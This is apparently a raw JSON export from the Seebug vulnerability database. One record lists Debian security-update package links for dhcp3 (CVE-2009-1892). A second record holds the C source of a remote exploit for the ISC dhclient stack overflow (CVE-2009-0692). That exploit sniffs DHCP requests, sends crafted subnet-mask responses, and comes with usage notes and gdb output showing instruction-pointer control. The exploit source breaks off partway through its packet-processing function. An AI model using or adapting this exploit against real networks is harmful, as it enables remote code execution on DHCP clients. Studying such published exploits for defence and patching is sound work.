dhcp3-server_3.0.4-13+etch2_powerpc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0. 4-13+etch2_powerpc.deb\r\nDebian Linux 5.0 alpha\r\nDebian dhcp3-client-udeb_3.1.1-6+lenny2_alpha.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.1.1-6+lenny2_alpha.udeb\r\nDebian dhcp3-client_3.1.1-6+lenny2_alpha.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1. 1-6+lenny2_alpha.deb\r\nDebian dhcp3-common_3.1.1-6+lenny2_alpha.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1. 1-6+lenny2_alpha.deb\r\nDebian dhcp3-dev_3.1.1-6+lenny2_alpha.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6 +lenny2_alpha.deb\r\nDebian dhcp3-relay_3.1.1-6+lenny2_alpha.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1 -6+lenny2_alpha.deb\r\nDebian dhcp3-server-ldap_3.1.1-6+lenny2_alpha.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap _3.1.1-6+lenny2_alpha.deb\r\nDebian dhcp3-server_3.1.1-6+lenny2_alpha.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1. 1-6+lenny2_alpha.deb\r\nDebian Linux 5.0 ia-32\r\nDebian dhcp3-client-udeb_3.1.1-6+lenny2_i386.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.1.1-6+lenny2_i386.udeb\r\nDebian dhcp3-client_3.1.1-6+lenny2_i386.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1. 1-6+lenny2_i386.deb\r\nDebian dhcp3-common_3.1.1-6+lenny2_i386.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1. 1-6+lenny2_i386.deb\r\nDebian dhcp3-dev_3.1.1-6+lenny2_i386.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6 +lenny2_i386.deb\r\nDebian dhcp3-relay_3.1.1-6+lenny2_i386.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1 -6+lenny2_i386.deb\r\nDebian dhcp3-server-ldap_3.1.1-6+lenny2_i386.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap _3.1.1-6+lenny2_i386.deb\r\nDebian dhcp3-server_3.1.1-6+lenny2_i386.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1. 1-6+lenny2_i386.deb\r\nDebian Linux 5.0 s/390\r\nDebian dhcp3-client-udeb_3.1.1-6+lenny2_s390.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.1.1-6+lenny2_s390.udeb\r\nDebian dhcp3-client_3.1.1-6+lenny2_s390.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1. 1-6+lenny2_s390.deb\r\nDebian dhcp3-common_3.1.1-6+lenny2_s390.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1. 1-6+lenny2_s390.deb\r\nDebian dhcp3-dev_3.1.1-6+lenny2_s390.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6 +lenny2_s390.deb\r\nDebian dhcp3-relay_3.1.1-6+lenny2_s390.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1 -6+lenny2_s390.deb\r\nDebian dhcp3-server-ldap_3.1.1-6+lenny2_s390.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap _3.1.1-6+lenny2_s390.deb\r\nDebian dhcp3-server_3.1.1-6+lenny2_s390.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1. 1-6+lenny2_s390.deb\r\nDebian Linux 5.0 mipsel\r\nDebian dhcp3-client-udeb_3.1.1-6+lenny2_mipsel.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.1.1-6+lenny2_mipsel.udeb\r\nDebian dhcp3-client_3.1.1-6+lenny2_mipsel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1. 1-6+lenny2_mipsel.deb\r\nDebian dhcp3-common_3.1.1-6+lenny2_mipsel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1. 1-6+lenny2_mipsel.deb\r\nDebian dhcp3-dev_3.1.1-6+lenny2_mipsel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6 +lenny2_mipsel.deb\r\nDebian dhcp3-relay_3.1.1-6+lenny2_mipsel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1 -6+lenny2_mipsel.deb\r\nDebian dhcp3-server-ldap_3.1.1-6+lenny2_mipsel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap _3.1.1-6+lenny2_mipsel.deb\r\nDebian dhcp3-server_3.1.1-6+lenny2_mipsel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1. 1-6+lenny2_mipsel.deb\r\nDebian Linux 4.0 amd64\r\nDebian dhcp3-client-udeb_3.0.4-13+etch2_amd64.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.0.4-13+etch2_amd64.udeb\r\nDebian dhcp3-common_3.0.4-13+etch2_amd64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0. 4-13+etch2_amd64.deb\r\nDebian dhcp3-dev_3.0.4-13+etch2_amd64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-1 3+etch2_amd64.deb\r\nDebian dhcp3-relay_3.0.4-13+etch2_amd64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4 -13+etch2_amd64.deb\r\nDebian dhcp3-server_3.0.4-13+etch2_amd64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0. 4-13+etch2_amd64.deb\r\nDebian Linux 4.0 ia-32\r\nDebian dhcp3-client-udeb_3.0.4-13+etch2_i386.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.0.4-13+etch2_i386.udeb\r\nDebian dhcp3-common_3.0.4-13+etch2_i386.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0. 4-13+etch2_i386.deb\r\nDebian dhcp3-dev_3.0.4-13+etch2_i386.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-1 3+etch2_i386.deb\r\nDebian dhcp3-relay_3.0.4-13+etch2_i386.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4 -13+etch2_i386.deb\r\nDebian dhcp3-server_3.0.4-13+etch2_i386.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0. 4-13+etch2_i386.deb\r\nDebian Linux 5.0 hppa\r\nDebian dhcp3-client-udeb_3.1.1-6+lenny2_hppa.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.1.1-6+lenny2_hppa.udeb\r\nDebian dhcp3-client_3.1.1-6+lenny2_hppa.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1. 1-6+lenny2_hppa.deb\r\nDebian dhcp3-common_3.1.1-6+lenny2_hppa.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1. 1-6+lenny2_hppa.deb\r\nDebian dhcp3-dev_3.1.1-6+lenny2_hppa.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6 +lenny2_hppa.deb\r\nDebian dhcp3-relay_3.1.1-6+lenny2_hppa.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1 -6+lenny2_hppa.deb\r\nDebian dhcp3-server-ldap_3.1.1-6+lenny2_hppa.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap _3.1.1-6+lenny2_hppa.deb\r\nDebian dhcp3-server_3.1.1-6+lenny2_hppa.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1. 1-6+lenny2_hppa.deb\r\nDebian Linux 4.0 hppa\r\nDebian dhcp3-client-udeb_3.0.4-13+etch2_hppa.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.0.4-13+etch2_hppa.udeb\r\nDebian dhcp3-common_3.0.4-13+etch2_hppa.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0. 4-13+etch2_hppa.deb\r\nDebian dhcp3-dev_3.0.4-13+etch2_hppa.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-1 3+etch2_hppa.deb\r\nDebian dhcp3-relay_3.0.4-13+etch2_hppa.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4 -13+etch2_hppa.deb\r\nDebian dhcp3-server_3.0.4-13+etch2_hppa.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0. 4-13+etch2_hppa.deb\r\nDebian Linux 4.0 sparc\r\nDebian dhcp3-client-udeb_3.0.4-13+etch2_sparc.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.0.4-13+etch2_sparc.udeb\r\nDebian dhcp3-common_3.0.4-13+etch2_sparc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0. 4-13+etch2_sparc.deb\r\nDebian dhcp3-dev_3.0.4-13+etch2_sparc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-1 3+etch2_sparc.deb\r\nDebian dhcp3-relay_3.0.4-13+etch2_sparc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4 -13+etch2_sparc.deb\r\nDebian dhcp3-server_3.0.4-13+etch2_sparc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0. 4-13+etch2_sparc.deb\r\nDebian Linux 5.0 arm\r\nDebian dhcp3-client-udeb_3.1.1-6+lenny2_arm.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.1.1-6+lenny2_arm.udeb\r\nDebian dhcp3-client_3.1.1-6+lenny2_arm.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1. 1-6+lenny2_arm.deb\r\nDebian dhcp3-common_3.1.1-6+lenny2_arm.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1. 1-6+lenny2_arm.deb\r\nDebian dhcp3-dev_3.1.1-6+lenny2_arm.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6 +lenny2_arm.deb\r\nDebian dhcp3-relay_3.1.1-6+lenny2_arm.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1 -6+lenny2_arm.deb\r\nDebian dhcp3-server-ldap_3.1.1-6+lenny2_arm.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap _3.1.1-6+lenny2_arm.deb\r\nDebian dhcp3-server_3.1.1-6+lenny2_arm.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1. 1-6+lenny2_arm.deb\r\nDebian Linux 4.0 alpha\r\nDebian dhcp3-client-udeb_3.0.4-13+etch2_alpha.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.0.4-13+etch2_alpha.udeb\r\nDebian dhcp3-common_3.0.4-13+etch2_alpha.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0. 4-13+etch2_alpha.deb\r\nDebian dhcp3-dev_3.0.4-13+etch2_alpha.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-1 3+etch2_alpha.deb\r\nDebian dhcp3-relay_3.0.4-13+etch2_alpha.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4 -13+etch2_alpha.deb\r\nDebian dhcp3-server_3.0.4-13+etch2_alpha.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0. 4-13+etch2_alpha.deb\r\nDebian Linux 5.0 armel\r\nDebian dhcp3-client-udeb_3.1.1-6+lenny2_armel.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.1.1-6+lenny2_armel.udeb\r\nDebian dhcp3-client_3.1.1-6+lenny2_armel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1. 1-6+lenny2_armel.deb\r\nDebian dhcp3-common_3.1.1-6+lenny2_armel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1. 1-6+lenny2_armel.deb\r\nDebian dhcp3-dev_3.1.1-6+lenny2_armel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6 +lenny2_armel.deb\r\nDebian dhcp3-relay_3.1.1-6+lenny2_armel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1 -6+lenny2_armel.deb\r\nDebian dhcp3-server-ldap_3.1.1-6+lenny2_armel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap _3.1.1-6+lenny2_armel.deb\r\nDebian dhcp3-server_3.1.1-6+lenny2_armel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1. 1-6+lenny2_armel.deb\r\nDebian Linux 4.0 mipsel\r\nDebian dhcp3-client-udeb_3.0.4-13+etch2_mipsel.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.0.4-13+etch2_mipsel.udeb\r\nDebian dhcp3-common_3.0.4-13+etch2_mipsel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0. 4-13+etch2_mipsel.deb\r\nDebian dhcp3-dev_3.0.4-13+etch2_mipsel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-1 3+etch2_mipsel.deb\r\nDebian dhcp3-relay_3.0.4-13+etch2_mipsel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4 -13+etch2_mipsel.deb\r\nDebian dhcp3-server_3.0.4-13+etch2_mipsel.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0. 4-13+etch2_mipsel.deb\r\nDebian Linux 5.0 amd64\r\nDebian dhcp3-client-udeb_3.1.1-6+lenny2_amd64.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.1.1-6+lenny2_amd64.udeb\r\nDebian dhcp3-client_3.1.1-6+lenny2_amd64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1. 1-6+lenny2_amd64.deb\r\nDebian dhcp3-common_3.1.1-6+lenny2_amd64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1. 1-6+lenny2_amd64.deb\r\nDebian dhcp3-dev_3.1.1-6+lenny2_amd64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6 +lenny2_amd64.deb\r\nDebian dhcp3-relay_3.1.1-6+lenny2_amd64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1 -6+lenny2_amd64.deb\r\nDebian dhcp3-server-ldap_3.1.1-6+lenny2_amd64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap _3.1.1-6+lenny2_amd64.deb\r\nDebian dhcp3-server_3.1.1-6+lenny2_amd64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1. 1-6+lenny2_amd64.deb\r\nDebian Linux 5.0 mips\r\nDebian dhcp3-client-udeb_3.1.1-6+lenny2_mips.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.1.1-6+lenny2_mips.udeb\r\nDebian dhcp3-client_3.1.1-6+lenny2_mips.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1. 1-6+lenny2_mips.deb\r\nDebian dhcp3-common_3.1.1-6+lenny2_mips.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1. 1-6+lenny2_mips.deb\r\nDebian dhcp3-dev_3.1.1-6+lenny2_mips.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6 +lenny2_mips.deb\r\nDebian dhcp3-relay_3.1.1-6+lenny2_mips.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1 -6+lenny2_mips.deb\r\nDebian dhcp3-server-ldap_3.1.1-6+lenny2_mips.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap _3.1.1-6+lenny2_mips.deb\r\nDebian dhcp3-server_3.1.1-6+lenny2_mips.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1. 1-6+lenny2_mips.deb\r\nDebian Linux 5.0 powerpc\r\nDebian dhcp3-client-udeb_3.1.1-6+lenny2_powerpc.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.1.1-6+lenny2_powerpc.udeb\r\nDebian dhcp3-client_3.1.1-6+lenny2_powerpc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1. 1-6+lenny2_powerpc.deb\r\nDebian dhcp3-common_3.1.1-6+lenny2_powerpc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1. 1-6+lenny2_powerpc.deb\r\nDebian dhcp3-dev_3.1.1-6+lenny2_powerpc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6 +lenny2_powerpc.deb\r\nDebian dhcp3-relay_3.1.1-6+lenny2_powerpc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1 -6+lenny2_powerpc.deb\r\nDebian dhcp3-server-ldap_3.1.1-6+lenny2_powerpc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap _3.1.1-6+lenny2_powerpc.deb\r\nDebian dhcp3-server_3.1.1-6+lenny2_powerpc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1. 1-6+lenny2_powerpc.deb\r\nDebian Linux 4.0 ia-64\r\nDebian dhcp3-client-udeb_3.0.4-13+etch2_ia64.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.0.4-13+etch2_ia64.udeb\r\nDebian dhcp3-common_3.0.4-13+etch2_ia64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0. 4-13+etch2_ia64.deb\r\nDebian dhcp3-dev_3.0.4-13+etch2_ia64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-1 3+etch2_ia64.deb\r\nDebian dhcp3-relay_3.0.4-13+etch2_ia64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4 -13+etch2_ia64.deb\r\nDebian dhcp3-server_3.0.4-13+etch2_ia64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0. 4-13+etch2_ia64.deb\r\nDebian Linux 4.0 mips\r\nDebian dhcp3-client-udeb_3.0.4-13+etch2_mips.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.0.4-13+etch2_mips.udeb\r\nDebian dhcp3-common_3.0.4-13+etch2_mips.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0. 4-13+etch2_mips.deb\r\nDebian dhcp3-dev_3.0.4-13+etch2_mips.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-1 3+etch2_mips.deb\r\nDebian dhcp3-relay_3.0.4-13+etch2_mips.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4 -13+etch2_mips.deb\r\nDebian dhcp3-server_3.0.4-13+etch2_mips.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0. 4-13+etch2_mips.deb\r\nDebian Linux 5.0 sparc\r\nDebian dhcp3-client-udeb_3.1.1-6+lenny2_sparc.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.1.1-6+lenny2_sparc.udeb\r\nDebian dhcp3-client_3.1.1-6+lenny2_sparc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1. 1-6+lenny2_sparc.deb\r\nDebian dhcp3-common_3.1.1-6+lenny2_sparc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1. 1-6+lenny2_sparc.deb\r\nDebian dhcp3-dev_3.1.1-6+lenny2_sparc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6 +lenny2_sparc.deb\r\nDebian dhcp3-relay_3.1.1-6+lenny2_sparc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1 -6+lenny2_sparc.deb\r\nDebian dhcp3-server-ldap_3.1.1-6+lenny2_sparc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap _3.1.1-6+lenny2_sparc.deb\r\nDebian dhcp3-server_3.1.1-6+lenny2_sparc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1. 1-6+lenny2_sparc.deb", "cvss3": {}, "published": "2009-07-15T00:00:00", "type": "seebug", "title": "ISC DHCP\u670d\u52a1\u5668\u4e3b\u673a\u5b9a\u4e49\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1892"], "modified": "2009-07-15T00:00:00", "id": "SSV:11816", "href": "https://www.seebug.org/vuldb/ssvid-11816", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T16:38:58", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "ISC DHCP 'dhclient' 'script_write_params()' - Stack Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2014-07-01T00:00:00", "id": "SSV:67020", "href": "https://www.seebug.org/vuldb/ssvid-67020", "sourceData": "\n /*\r\n * cve-2009-0692.c\r\n *\r\n * ISC DHCP dhclient &#60; 3.1.2p1 Remote Exploit\r\n * Jon Oberheide &#60;jon@oberheide.org&#62;\r\n * http://jon.oberheide.org\r\n * \r\n * Information:\r\n * \r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692\r\n * \r\n * Stack-based buffer overflow in the script_write_params method in \r\n * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before \r\n * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to \r\n * execute arbitrary code via a crafted subnet-mask option.\r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet\r\n * $ sudo ./cve-2009-0692\r\n * [+] listening on eth0: ip and udp and src port 68 and dst port 67\r\n * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920\r\n * [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920\r\n *\r\n * $ gdb /sbin/dhclient\r\n * ...\r\n * DHCPREQUEST on eth0 to 255.255.255.255 port 67\r\n * DHCPACK from 0.6.9.2\r\n * ...\r\n * Program received signal SIGSEGV, Segmentation fault.\r\n * 0x41414141 in ?? ()\r\n * \r\n * Notes:\r\n * \r\n * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free\r\n * to tweak for your target platform. Depends on libdnet and libpcap.\r\n *\r\n * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the \r\n * stack during our overflow. After a successful return from the vulnerable\r\n * script_write_params function, EIP will be set to JMP_TARGET.\r\n *\r\n * Exclusively for use at DEFCON next week. ;-) \r\n */\r\n\r\n#include &#60;ctype.h&#62;\r\n#include &#60;stdio.h&#62;\r\n#include &#60;stdlib.h&#62;\r\n#include &#60;stdint.h&#62;\r\n#include &#60;string.h&#62;\r\n#include &#60;unistd.h&#62;\r\n#include &#60;dnet.h&#62;\r\n#include &#60;pcap.h&#62;\r\n\r\n#define READABLE_1 &#34;\\xa8\\xfc\\x0b\\x08&#34; /* for es.client */\r\n#define READABLE_2 &#34;\\xbc\\x34\\x0a\\x08&#34; /* for es.prefix */\r\n#define JMP_TARGET &#34;\\x41\\x41\\x41\\x41&#34;\r\n\r\n#define BPF_FILTER &#34;ip and udp and src port 68 and dst port 67&#34;\r\n#define PKT_BUFSIZ 1514\r\n#define DHCP_OP_REQUEST 1\r\n#define DHCP_OP_REPLY 2\r\n#define DHCP_TYPE_REQUEST 3\r\n#define DHCP_TYPE_ACK 5\r\n#define DHCP_OPT_REQIP 50\r\n#define DHCP_OPT_MSGTYPE 53\r\n#define DHCP_OPT_END 255\r\n#define DHCP_CHADDR_LEN 16\r\n#define SERVERNAME_LEN 64\r\n#define BOOTFILE_LEN 128\r\n#define DHCP_HDR_LEN 240\r\n#define DHCP_OPT_HDR_LEN 2\r\n\r\n#ifndef __GNUC__\r\n# define __attribute__(x)\r\n# pragma pack(1)\r\n#endif\r\n\r\nstruct dhcp_hdr {\r\n\tuint8_t op;\r\n\tuint8_t hwtype;\r\n\tuint8_t hwlen;\r\n\tuint8_t hwopcount;\r\n\tuint32_t xid;\r\n\tuint16_t secs;\r\n\tuint16_t flags;\r\n\tuint32_t ciaddr;\r\n\tuint32_t yiaddr;\r\n\tuint32_t siaddr;\r\n\tuint32_t giaddr;\r\n\tuint8_t chaddr[DHCP_CHADDR_LEN];\r\n\tuint8_t servername[SERVERNAME_LEN];\r\n\tuint8_t bootfile[BOOTFILE_LEN];\r\n\tuint32_t cookie;\r\n} __attribute__((__packed__));\r\n\r\nstruct dhcp_opt {\r\n\tuint8_t opt;\r\n\tuint8_t len;\r\n} __attribute__((__packed__));\r\n\r\n#ifndef __GNUC__\r\n# pragma pack()\r\n#endif\r\n\r\nvoid\r\nprocess(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt)\r\n{\r\n\teth_t *raw;\r\n\tstruct ip_hdr *ip_h;\r\n\tstruct eth_hdr *eth_h;\r\n\tstruct udp_hdr *udp_h;\r\n\tstruct dhcp_hdr *dhcp_h;\r\n\tstruct dhcp_opt *dhcp_opt;\r\n\tchar *dev = data, *ptr;\r\n\tchar pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ];\r\n\tint opt_len, clen = pkthdr-&#62;caplen;\r\n\tuint8_t msg_type = 0, payload_len = 0;\r\n\tuint32_t yiaddr = 0;\r\n\r\n\t/* packet too short */\r\n\tif (clen &#60; ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) {\r\n\t\treturn;\r\n\t}\r\n\r\n\teth_h = (struct eth_hdr *) pkt;\r\n\tip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN);\r\n\tudp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN);\r\n\tdhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN);\r\n\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN);\r\n\r\n\t/* only care about REQUEST opcodes */\r\n\tif (dhcp_h-&#62;op != DHCP_OP_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\t/* parse DHCP options */\r\n\twhile (1) {\r\n\t\tif (dhcp_opt-&#62;opt == DHCP_OPT_MSGTYPE) {\r\n\t\t\tif (dhcp_opt-&#62;len != 1) {\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt-&#62;len);\r\n\t\t}\r\n\t\tif (dhcp_opt-&#62;opt == DHCP_OPT_REQIP) {\r\n\t\t\tif (dhcp_opt-&#62;len != 4) 